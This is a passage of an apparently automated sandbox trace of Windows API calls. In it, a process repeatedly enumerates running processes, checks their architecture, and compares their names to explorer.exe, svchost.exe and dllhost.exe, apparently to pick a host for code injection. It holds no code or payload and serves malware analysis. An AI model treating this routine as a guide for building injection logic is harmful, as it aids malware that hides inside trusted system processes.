Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.310] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.310] CloseHandle (hObject=0xec) returned 1 [0233.310] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0233.310] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0233.310] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.310] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.310] CloseHandle (hObject=0xec) returned 1 [0233.311] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.311] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0233.311] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.311] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0233.312] CloseHandle (hObject=0xec) returned 1 [0233.312] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0233.312] CloseHandle (hObject=0xe8) returned 1 [0233.312] Sleep (dwMilliseconds=0x3e8) [0234.332] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0234.334] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0234.334] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0234.334] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0234.335] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0234.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0234.335] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0234.335] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0234.336] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0234.336] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0234.336] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0234.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0234.337] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0234.337] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0234.337] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0234.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0234.338] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0234.338] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0234.338] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0234.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0234.339] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.339] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0234.339] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0234.340] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.340] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0234.340] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0234.341] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0234.341] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0234.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0234.342] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0234.342] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0234.343] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0234.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0234.343] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.343] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.343] CloseHandle (hObject=0xec) returned 1 [0234.343] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0234.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0234.344] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0234.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0234.344] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.344] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.344] CloseHandle (hObject=0xec) returned 1 [0234.344] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0234.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0234.345] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0234.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0234.345] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0234.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0234.346] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.346] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.346] CloseHandle (hObject=0xec) returned 1 [0234.346] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0234.346] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0234.346] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0234.346] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0234.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0234.347] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.347] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.347] CloseHandle (hObject=0xec) returned 1 [0234.347] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0234.347] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0234.347] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0234.347] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0234.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0234.347] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.347] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.347] CloseHandle (hObject=0xec) returned 1 [0234.347] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0234.347] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0234.347] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0234.347] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0234.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0234.348] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.348] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.348] CloseHandle (hObject=0xec) returned 1 [0234.348] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0234.348] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0234.348] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0234.348] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0234.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0234.349] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.349] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.349] CloseHandle (hObject=0xec) returned 1 [0234.349] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0234.349] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0234.349] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0234.349] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0234.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0234.349] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.349] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.349] CloseHandle (hObject=0xec) returned 1 [0234.349] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0234.349] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0234.349] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0234.350] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0234.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0234.350] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.350] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.350] CloseHandle (hObject=0xec) returned 1 [0234.350] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0234.350] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0234.350] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0234.350] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0234.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0234.351] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.351] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.351] CloseHandle (hObject=0xec) returned 1 [0234.351] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0234.351] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0234.351] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0234.351] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0234.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0234.351] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.351] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.351] CloseHandle (hObject=0xec) returned 1 [0234.351] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0234.352] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0234.352] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0234.352] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0234.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0234.352] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.352] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.352] CloseHandle (hObject=0xec) returned 1 [0234.352] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0234.352] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0234.352] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0234.352] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0234.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0234.353] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.353] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.353] CloseHandle (hObject=0xec) returned 1 [0234.353] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0234.353] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0234.353] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0234.353] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0234.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0234.354] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.354] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.354] CloseHandle (hObject=0xec) returned 1 [0234.354] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0234.354] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0234.354] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0234.354] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0234.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0234.354] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.354] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.354] CloseHandle (hObject=0xec) returned 1 [0234.354] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0234.354] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0234.354] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0234.354] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0234.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0234.355] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.355] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.355] CloseHandle (hObject=0xec) returned 1 [0234.355] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0234.355] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0234.355] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0234.355] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0234.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0234.356] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.356] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0234.356] CloseHandle (hObject=0xec) returned 1 [0234.356] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0234.356] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0234.356] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0234.356] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 